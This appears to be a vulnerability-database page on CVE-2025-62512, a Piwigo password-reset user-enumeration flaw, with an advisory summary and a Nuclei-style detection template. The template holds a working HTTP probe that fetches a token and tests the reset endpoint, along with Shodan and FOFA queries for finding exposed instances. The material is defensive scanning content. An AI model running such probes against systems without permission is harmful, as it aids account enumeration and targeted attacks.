| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-62512 | 24 Feb 202616:43 | – | attackerkb | |
| CVE-2025-62512 | 24 Mar 202610:46 | – | circl | |
| Piwigo 安全漏洞 | 24 Feb 202600:00 | – | cnnvd | |
| CVE-2025-62512 | 24 Feb 202616:43 | – | cve | |
| CVE-2025-62512 Piwigo Vulnerable to User Enumeration via Password Reset Endpoint | 24 Feb 202616:43 | – | cvelist | |
| CVE-2025-62512 | 24 Feb 202618:29 | – | nvd | |
| CVE-2025-62512 Piwigo Vulnerable to User Enumeration via Password Reset Endpoint | 24 Feb 202616:43 | – | osv | |
| PT-2026-21770 | 24 Feb 202600:00 | – | ptsecurity | |
| CVE-2025-62512 | 25 Feb 202622:19 | – | redhatcve | |
| CVE-2025-62512 Piwigo Vulnerable to User Enumeration via Password Reset Endpoint | 24 Feb 202616:43 | – | vulnrichment |
id: CVE-2025-62512
info:
name: Piwigo - User Enumeration via Password Reset
author: DhiyaneshDk
severity: medium
description: |
Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of time of publication, no known patches are available.
impact: |
Unauthenticated attackers can enumerate valid usernames or email addresses, aiding further targeted attacks.
remediation: |
Update to the latest version when available or apply mitigations to unify response messages.
reference:
- https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-62512
epss-score: 0.00766
epss-percentile: 0.51158
cwe-id: CWE-204
metadata:
verified: true
max-request: 2
vendor: piwigo
product: piwigo
shodan-query: http.html:"Piwigo"
fofa-query: body="Piwigo"
tags: cve,cve2025,piwigo,user-enum,exposure
flow: http(1) && http(2)
http:
- raw:
- |
GET /password.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- 'name="pwg_token"\s+value="([a-f0-9]+)"'
internal: true
- raw:
- |
POST /password.php?action=lost HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
pwg_token={{token}}&username_or_email=nonexistent-{{rand_int(10000,99999)}}@example.com&submit=Change+my+password
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Invalid username or email"
- type: status
status:
- 200
# digest: 4b0a00483046022100a2e8dfaa645af5912322c94ce92e3ed74a65eec0b7f24ad5f98d19b6c477c8570221009ce7de806c7a2256d172f7c85acb061ea82b530b42699064ac7cab31ad5f628f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation